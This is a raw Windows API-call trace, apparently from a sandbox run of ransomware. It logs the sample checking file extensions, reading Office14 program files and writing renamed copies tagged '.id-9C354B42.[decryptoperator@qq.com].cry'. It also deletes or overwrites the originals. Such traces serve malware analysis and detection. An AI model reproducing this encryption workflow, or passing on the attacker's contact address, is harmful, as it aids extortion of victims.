[0055.162] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0055.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 63 [0055.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 63 [0055.162] lstrlenW (lpString=".doc") returned 4 [0055.162] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0055.162] lstrlenW (lpString=".docx") returned 5 [0055.162] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0055.162] lstrlenW (lpString=".pdf") returned 4 [0055.162] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0055.162] lstrlenW (lpString=".xls") returned 4 [0055.162] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0055.162] lstrlenW (lpString=".xlsx") returned 5 [0055.162] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0055.162] lstrlenW (lpString=".ppt") returned 4 [0055.162] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0055.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 63 [0055.162] lstrlenW (lpString=".zip") returned 4 [0055.162] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0055.162] lstrlenW (lpString=".rar") returned 4 [0055.162] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0055.162] lstrlenW (lpString=".bz2") returned 4 [0055.162] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0055.162] lstrlenW (lpString=".7z") returned 3 [0055.162] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0055.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 63 [0055.162] lstrlenW (lpString=".dbf") returned 4 [0055.162] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0055.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 63 [0055.162] lstrlenW (lpString=".1cd") returned 4 [0055.163] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0055.163] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 63 [0055.163] lstrlenW (lpString=".jpg") returned 4 [0055.163] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0055.163] lstrcmpiW (lpString1=".EXE", lpString2=".cry") returned 1 [0055.163] lstrlenW (lpString="LICLUA.EXE") returned 10 [0055.163] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\liclua.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0055.270] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=204168) returned 1 [0055.270] CloseHandle (hObject=0x220) returned 1 [0055.270] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\liclua.exe")) returned 0x20 [0055.270] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\liclua.exe.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0055.270] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\liclua.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0055.270] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.270] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.270] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\liclua.exe.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0055.270] GetLastError () returned 0x0 [0055.270] ReadFile (in: hFile=0x220, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x31d88, lpOverlapped=0x0) returned 1 [0055.473] WriteFile (in: hFile=0x1f4, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0x31d90, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x31d90, lpOverlapped=0x0) returned 1 [0055.476] ReadFile (in: hFile=0x220, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.476] WriteFile (in: hFile=0x1f4, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0055.476] SetEndOfFile (hFile=0x1f4) returned 1 [0055.476] CloseHandle (hObject=0x1f4) returned 1 [0055.476] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.476] SetEndOfFile (hFile=0x220) returned 1 [0055.478] CloseHandle (hObject=0x220) returned 1 [0055.478] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0055.479] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\liclua.exe")) returned 1 [0055.479] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE") returned 66 [0055.479] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE") returned 66 [0055.479] lstrlenW (lpString=".doc") returned 4 [0055.479] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0055.479] lstrlenW (lpString=".docx") returned 5 [0055.479] lstrcmpiW (lpString1=".docx", lpString2="A.EXE") returned -1 [0055.479] lstrlenW (lpString=".pdf") returned 4 [0055.479] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0055.479] lstrlenW (lpString=".xls") returned 4 [0055.479] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0055.479] lstrlenW (lpString=".xlsx") returned 5 [0055.479] lstrcmpiW (lpString1=".xlsx", lpString2="A.EXE") returned -1 [0055.479] lstrlenW (lpString=".ppt") returned 4 [0055.479] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0055.479] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE") returned 66 [0055.479] lstrlenW (lpString=".zip") returned 4 [0055.479] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0055.479] lstrlenW (lpString=".rar") returned 4 [0055.479] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0055.479] lstrlenW (lpString=".bz2") returned 4 [0055.479] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0055.479] lstrlenW (lpString=".7z") returned 3 [0055.479] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0055.479] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE") returned 66 [0055.479] lstrlenW (lpString=".dbf") returned 4 [0055.479] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0055.479] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE") returned 66 [0055.479] lstrlenW (lpString=".1cd") returned 4 [0055.479] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0055.479] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE") returned 66 [0055.480] lstrlenW (lpString=".jpg") returned 4 [0055.480] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0055.480] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE") returned 66 [0055.480] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE") returned 66 [0055.480] lstrlenW (lpString=".doc") returned 4 [0055.480] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0055.480] lstrlenW (lpString=".docx") returned 5 [0055.480] lstrcmpiW (lpString1=".docx", lpString2="A.EXE") returned -1 [0055.480] lstrlenW (lpString=".pdf") returned 4 [0055.480] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0055.480] lstrlenW (lpString=".xls") returned 4 [0055.480] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0055.480] lstrlenW (lpString=".xlsx") returned 5 [0055.480] lstrcmpiW (lpString1=".xlsx", lpString2="A.EXE") returned -1 [0055.480] lstrlenW (lpString=".ppt") returned 4 [0055.480] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0055.480] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE") returned 66 [0055.480] lstrlenW (lpString=".zip") returned 4 [0055.480] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0055.480] lstrlenW (lpString=".rar") returned 4 [0055.480] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0055.480] lstrlenW (lpString=".bz2") returned 4 [0055.480] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0055.480] lstrlenW (lpString=".7z") returned 3 [0055.480] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0055.480] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE") returned 66 [0055.480] lstrlenW (lpString=".dbf") returned 4 [0055.480] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0055.480] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE") returned 66 [0055.480] lstrlenW (lpString=".1cd") returned 4 [0055.480] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0055.480] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE") returned 66 [0055.480] lstrlenW (lpString=".jpg") returned 4 [0055.480] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0055.481] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0055.481] lstrlenW (lpString="MSO.DLL") returned 7 [0055.481] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\mso.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0055.481] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=25417600) returned 1 [0055.481] CloseHandle (hObject=0x220) returned 1 [0055.481] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\mso.dll")) returned 0x20 [0055.481] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\mso.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0055.481] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\mso.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\mso.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0055.482] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\mso.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0055.482] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc6c | out: lpNewFilePointer=0x0) returned 1 [0055.482] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0055.482] ReadFile (in: hFile=0x220, lpBuffer=0x3950058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x3950058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0055.504] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8147d5, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0055.504] ReadFile (in: hFile=0x220, lpBuffer=0x3990058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x3990058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0055.554] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2d9fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0055.554] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x17fd780, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0055.554] ReadFile (in: hFile=0x220, lpBuffer=0x39d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x39d0058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0055.581] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.581] WriteFile (in: hFile=0x220, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xc00fa, lpNumberOfBytesWritten=0x2d9fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fcb0*=0xc00fa, lpOverlapped=0x0) returned 1 [0055.593] SetEndOfFile (hFile=0x220) returned 1 [0055.730] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3ef0060 [0055.730] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0055.730] WriteFile (in: hFile=0x220, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0055.731] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8147d5, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0055.731] WriteFile (in: hFile=0x220, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0055.736] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x17fd780, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0055.736] WriteFile (in: hFile=0x220, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0055.737] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3ef0060 | out: hHeap=0x600000) returned 1 [0055.737] CloseHandle (hObject=0x220) returned 1 [0055.738] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0055.738] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL") returned 63 [0055.738] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL") returned 63 [0055.738] lstrlenW (lpString=".doc") returned 4 [0055.738] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0055.738] lstrlenW (lpString=".docx") returned 5 [0055.738] lstrcmpiW (lpString1=".docx", lpString2="O.DLL") returned -1 [0055.738] lstrlenW (lpString=".pdf") returned 4 [0055.738] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0055.738] lstrlenW (lpString=".xls") returned 4 [0055.738] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0055.738] lstrlenW (lpString=".xlsx") returned 5 [0055.738] lstrcmpiW (lpString1=".xlsx", lpString2="O.DLL") returned -1 [0055.739] lstrlenW (lpString=".ppt") returned 4 [0055.739] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0055.739] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL") returned 63 [0055.739] lstrlenW (lpString=".zip") returned 4 [0055.739] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0055.739] lstrlenW (lpString=".rar") returned 4 [0055.739] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0055.739] lstrlenW (lpString=".bz2") returned 4 [0055.739] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0055.739] lstrlenW (lpString=".7z") returned 3 [0055.739] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0055.739] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL") returned 63 [0055.739] lstrlenW (lpString=".dbf") returned 4 [0055.739] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0055.739] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL") returned 63 [0055.739] lstrlenW (lpString=".1cd") returned 4 [0055.739] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0055.739] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL") returned 63 [0055.739] lstrlenW (lpString=".jpg") returned 4 [0055.739] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0055.739] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL") returned 63 [0055.739] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL") returned 63 [0055.739] lstrlenW (lpString=".doc") returned 4 [0055.739] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0055.739] lstrlenW (lpString=".docx") returned 5 [0055.739] lstrcmpiW (lpString1=".docx", lpString2="O.DLL") returned -1 [0055.739] lstrlenW (lpString=".pdf") returned 4 [0055.739] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0055.739] lstrlenW (lpString=".xls") returned 4 [0055.739] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0055.739] lstrlenW (lpString=".xlsx") returned 5 [0055.739] lstrcmpiW (lpString1=".xlsx", lpString2="O.DLL") returned -1 [0055.739] lstrlenW (lpString=".ppt") returned 4 [0055.739] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0055.739] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL") returned 63 [0055.739] lstrlenW (lpString=".zip") returned 4 [0055.739] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0055.739] lstrlenW (lpString=".rar") returned 4 [0055.740] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0055.740] lstrlenW (lpString=".bz2") returned 4 [0055.740] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0055.740] lstrlenW (lpString=".7z") returned 3 [0055.740] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0055.740] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL") returned 63 [0055.740] lstrlenW (lpString=".dbf") returned 4 [0055.740] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0055.740] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL") returned 63 [0055.740] lstrlenW (lpString=".1cd") returned 4 [0055.740] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0055.740] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL") returned 63 [0055.740] lstrlenW (lpString=".jpg") returned 4 [0055.740] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0055.740] lstrcmpiW (lpString1=".dll", lpString2=".cry") returned 1 [0055.740] lstrlenW (lpString="msoshext.dll") returned 12 [0055.740] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoshext.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0055.740] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=1269648) returned 1 [0055.740] CloseHandle (hObject=0x220) returned 1 [0055.740] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoshext.dll")) returned 0x20 [0055.740] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoshext.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0055.741] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoshext.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.741] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll") returned 68 [0055.741] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll") returned 68 [0055.741] lstrlenW (lpString=".doc") returned 4 [0055.741] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0055.741] lstrlenW (lpString=".docx") returned 5 [0055.741] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0055.741] lstrlenW (lpString=".pdf") returned 4 [0055.741] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0055.741] lstrlenW (lpString=".xls") returned 4 [0055.741] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0055.741] lstrlenW (lpString=".xlsx") returned 5 [0055.741] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0055.741] lstrlenW (lpString=".ppt") returned 4 [0055.741] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0055.741] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll") returned 68 [0055.741] lstrlenW (lpString=".zip") returned 4 [0055.741] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0055.741] lstrlenW (lpString=".rar") returned 4 [0055.741] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0055.741] lstrlenW (lpString=".bz2") returned 4 [0055.741] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0055.741] lstrlenW (lpString=".7z") returned 3 [0055.741] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0055.741] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll") returned 68 [0055.741] lstrlenW (lpString=".dbf") returned 4 [0055.741] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0055.741] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll") returned 68 [0055.741] lstrlenW (lpString=".1cd") returned 4 [0055.741] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0055.741] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll") returned 68 [0055.741] lstrlenW (lpString=".jpg") returned 4 [0055.741] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0055.742] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll") returned 68 [0055.742] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll") returned 68 [0055.742] lstrlenW (lpString=".doc") returned 4 [0055.742] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0055.742] lstrlenW (lpString=".docx") returned 5 [0055.742] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0055.742] lstrlenW (lpString=".pdf") returned 4 [0055.742] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0055.742] lstrlenW (lpString=".xls") returned 4 [0055.742] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0055.742] lstrlenW (lpString=".xlsx") returned 5 [0055.742] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0055.742] lstrlenW (lpString=".ppt") returned 4 [0055.742] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0055.742] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll") returned 68 [0055.742] lstrlenW (lpString=".zip") returned 4 [0055.742] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0055.742] lstrlenW (lpString=".rar") returned 4 [0055.742] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0055.742] lstrlenW (lpString=".bz2") returned 4 [0055.742] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0055.742] lstrlenW (lpString=".7z") returned 3 [0055.742] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0055.742] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll") returned 68 [0055.742] lstrlenW (lpString=".dbf") returned 4 [0055.742] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0055.742] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll") returned 68 